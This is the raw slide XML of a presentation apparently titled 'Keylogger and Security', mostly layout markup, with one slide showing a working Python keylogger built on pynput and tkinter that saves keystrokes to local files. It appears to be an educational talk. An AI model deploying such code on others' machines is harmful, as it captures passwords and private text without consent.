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nton" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial" charset="1" panose="020B0502020202020204"/>
      <p:regular r:id="rId21"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bebas Neue Cyrillic" charset="1" panose="02000506000000020004"/>
      <p:regular r:id="rId22"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Canva Sans" charset="1" panose="020B0503030501040103"/>
      <p:regular r:id="rId23"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans" charset="1" panose="00000000000000000000"/>
      <p:regular r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Bold" charset="1" panose="00000000000000000000"/>
      <p:regular r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="RQND Pro" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Alice" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Comic Sans" charset="1" panose="03000702030302020204"/>
      <p:regular r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Canva Sans Bold" charset="1" panose="020B08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 Id="rId4"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 Id="rId5"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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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16461" y="0"/>
            <a:ext cx="4182573" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1101583" cy="2709333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 3" id="3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1101583" cy="2709333"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2709333" w="1101583">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1101583" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101583" y="2709333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2709333"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-38100"/>
              <a:ext cx="110158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06707" y="1860559"/>
            <a:ext cx="9145640" cy="6984983"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6984983" w="9145640">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9145640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9145640" y="6984982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6984982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="-616461" y="2078028"/>
            <a:ext cx="8528306" cy="4624806"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11371075" cy="6166408"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 7" id="7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="1363" t="0" r="1363" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11371075" cy="6166408"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="2873855" y="3250382"/>
            <a:ext cx="2617437" cy="2656070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2656070" w="2617437">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2617437" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2617437" y="2656070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2656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803136" y="3923517"/>
            <a:ext cx="758874" cy="1028031"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1028031" w="758874">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="758874" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758874" y="1028031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10280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421282" y="-565083"/>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8">
              <a:alphaModFix amt="17000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="1396574"/>
            <a:ext cx="9932431" cy="6382736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="16756"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="14081">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>KEYLOGGER AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="16756"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="14081">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11679017" y="8731241"/>
            <a:ext cx="6313613" cy="538481"/>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Arial"/>
              </a:rPr>
              <a:t>---Bonagiri sri manikanta swamy guptha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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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797342" y="145786"/>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7000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13754502" y="1341202"/>
            <a:ext cx="3802298" cy="38022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38278" t="0" r="-11815" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13754502" y="5456002"/>
            <a:ext cx="3802298" cy="38022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5954" t="0" r="-133566" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="552392" y="846537"/>
            <a:ext cx="7382031" cy="989330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7735"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>CODE FOR KEYLOGGER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="552392" y="2478310"/>
            <a:ext cx="3432942" cy="6442858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>import tkinter as tk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>from tkinter import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>import json</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>keys_used = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w") as keys_file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>        keys_file.write(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>def generate_json_file(keys_used):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    with open('key_log.json', 'w') as key_log:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>        json.dump(keys_used, key_log)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>def on_press(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    if not flag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>        keys_used.append({'Pressed': str(key)})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>        keys_used.append({'Held': str(key)})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>def on_release(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    keys_used.append({'Released': str(key)})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    keys += str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1043">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Alice"/>
              </a:rPr>
              <a:t>    generate_text_log(keys)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3986372" y="2487835"/>
            <a:ext cx="6810970" cy="6390576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>def start_keylogger():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> listener.start()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'key_log.txt' and 'key_log.json'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> start_button.config(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> stop_button.config(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> listener.stop()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> label.config(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
